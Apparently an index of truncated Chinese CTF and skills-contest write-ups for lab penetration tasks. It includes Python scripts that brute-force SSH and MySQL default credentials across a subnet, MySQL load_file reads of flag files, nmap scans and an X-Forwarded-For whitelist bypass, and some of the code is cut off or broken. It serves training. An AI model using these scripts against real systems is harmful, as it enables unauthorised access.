MySQL读文件 #coding=utf-8 import MySQLdb host = '172.16.1.' for i in range(129,131): tag = host+str(i) print tag+"3306" try: MySQLdb.connect(tag,3306,'root','root','mysql',timeout=1) cur = conn.cursor() cur.execute("select load_file('/root/fla…
自动爆破SSH弱口令+读取Flag #coding=utf-8 import paramiko sshc = paramiko.SSHClient() sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy()) host = "172.16.1." for i in range(120,131): tag = host+str(i) print tag try: try: sshc.connect(tag,22,',timeou…
Base64加解密: ubuntu@VM-0-5-ubuntu:~$ echo iloveyou | base64aWxvdmV5b3UKubuntu@VM-0-5-ubuntu:~$ echo aWxvdmV5b3UK | base64 -diloveyou MD5加解密: ubuntu@VM-0-5-ubuntu:~$ opensslOpenSSL> md5iloveyou #这里按三次ctrl+d(stdin)= f25a2fc72690b780b2a14e140ef6a9e0 文件包含读…
DEMO: #coding=utf-8 import MySQLdb class MSSQL: def __init__(self,host,user,pwd): self.host = host self.user = user self.pwd = pwd def connect_dp(self): conn = MySQLdb.connect(host=self.host,port=Flag3, user=Flag4,passwd=self.pwd,db='mysql',) cur = c…
任务四:服务远程控制任务环境说明:服务器场景名:20200609(关闭链接)服务器场景操作系统:未知服务器场景用户名:root服务器场景密码:Admin123 1.    通过本地PC中渗透测试平台Kali对服务器场景进行系统版本扫描渗透测试,并将该操作显示结果中系统信息作为FLAG提交: nmap -sV 扫就行了 Windows Server 2008 R2 – 2012 2.    通过本地PC中渗透测试平台windows7对服务器场景进行终端服务开启,并将该操作显示结果中服务端口号作为F…
Web隐藏信息获取任务环境说明:服务器场景名:web20200604服务器场景用户名:未知(关闭链接) 1.    通过本地PC中渗透测试平台Kali使用Nmap扫描目标靶机HTTP服务子目录,将扫描子目录命令所需参数及第四条扫描结果关键目录以&符号拼接,作为Flag提交(例:-p 22&/root/): nmap --script http-enum 172.16.102.249 --script http-enum&/auth/ 2.    通过本地PC中渗透测试平台Kali访…
Web安全应用-2 任务环境说明: √ 服务器场景: match_win03-3-1(关闭链接) √ 服务器场景操作系统:Windows Server 2003 1. 使用渗透机Kali Linux,登录靶机HTTP服务后台管理页面,并将后台管理页面代码中 Flag值提交. 扫描目录,发现有个admin目录 user:admin password:admin 登陆试试,回显了一个ip地址不在白名单 XFF伪造本地登陆就行 查看源代码搜flag就行 flag1 {Oauth0} 2.    使用渗…
Web安全渗透测试任务环境说明: 服务器场景:PYsystem003(关闭链接)服务器操作系统:未知用户名:未知 密码:未知 1.    通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交: 连续按F12就能查源码 flag{fc35fdc70d5fc69d269883a822c7a53e} 2.    通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:fl…
任务环境说明: 服务器场景:teltest 服务器场景操作系统:Windows7 (封闭靶机) 1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该 作显示结果中Telnet服务对应的端口号作为FLAG提交: 思路:nmap扫,如果扫了之后不好判断就打进去,查看进程 此时看到telnet的进程时1988 cmd中netstat -ano查看端口后对应的进程 232端口就是telnet的端口号 FLAG:232 2.通过本地PC中渗透测试平台Kal…
任务环境说明: 服务器场景名称:sql008 服务器场景用户名:administrator:密码:未知(封闭靶机) 1.使用渗透机场景kali中工具扫描服务器场景,将iis的版本号作为flag提交: 思路:nmap直接扫就行 FLAG:Microsoft IIS httpd 7.5 2.使用渗透机场景windows7访问服务器场景,并下载某文件夹下的web目录下的username.txt和wxl_pass_burp.txt,并将username.txt中的用户数量作为flag提交: 思路:这题我…